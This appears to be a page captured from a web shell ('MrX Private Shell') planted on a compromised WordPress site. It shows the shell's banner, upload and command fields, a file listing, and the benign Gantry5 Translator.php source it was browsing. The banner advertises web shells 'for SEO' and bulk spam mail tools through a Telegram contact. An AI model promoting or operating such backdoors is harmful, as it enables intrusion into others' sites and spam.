__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * @package   Gantry5
 * @author    RocketTheme http://www.rockettheme.com
 * @copyright Copyright (C) 2007 - 2021 RocketTheme, LLC
 * @license   GNU/GPLv2 and later
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 */

namespace Gantry\Framework;

use Gantry\Component\Translator\Translator as BaseTranslator;

/**
 * Class Translator
 * @package Gantry\Framework
 */
class Translator extends BaseTranslator
{
    /**
     * @param string $string
     * @return string
     */
    public function translate($string)
    {
        static $textdomain;
        static $enginedomain;

        /** @var Theme $theme */
        $theme = Gantry::instance()['theme'];

        if (null === $textdomain) {
            $textdomain = $theme->details()->get('configuration.theme.textdomain', false);
            $enginedomain = $theme->details()->get('configuration.gantry.engine', 'nucleus');
        }

        $translated = $textdomain ? \__($string, $textdomain) : $string;

        if ($translated === $string) {
            $translated = \__($string, $enginedomain);
        }

        if ($translated === $string) {
            $translated = \__($string, 'gantry5');
        }

        if ($translated === $string) {
            // Create WP compatible translation string.
            $string = parent::translate($string);

            $translated = $textdomain ? \__($string, $textdomain) : $string;
            if ($translated === $string) {
                $translated = \__($string, 'gantry5');
            }
        }

        if (\func_num_args() === 1) {
            return $translated;
        }

        $args = \func_get_args();
        $args[0] = $translated;

        return sprintf(...$args);
    }
}

Filemanager

Name Type Size Permission Actions
Base Folder 0775
Markdown Folder 0775
Services Folder 0775
Assignments.php File 2.02 KB 0775
Atoms.php File 9.32 KB 0775
Configurations.php File 472 B 0775
Document.php File 7.37 KB 0775
Exception.php File 1.16 KB 0775
Exporter.php File 478 B 0775
Gantry.php File 3.56 KB 0775
Importer.php File 492 B 0775
Menu.php File 19.96 KB 0775
OutlineChooser.php File 324 B 0775
Outlines.php File 911 B 0775
Page.php File 2.26 KB 0775
Platform.php File 10.84 KB 0775
Positions.php File 558 B 0775
Request.php File 962 B 0775
Site.php File 577 B 0775
Theme.php File 21.46 KB 0775
ThemeInstaller.php File 710 B 0775
Translator.php File 1.68 KB 0775
Filemanager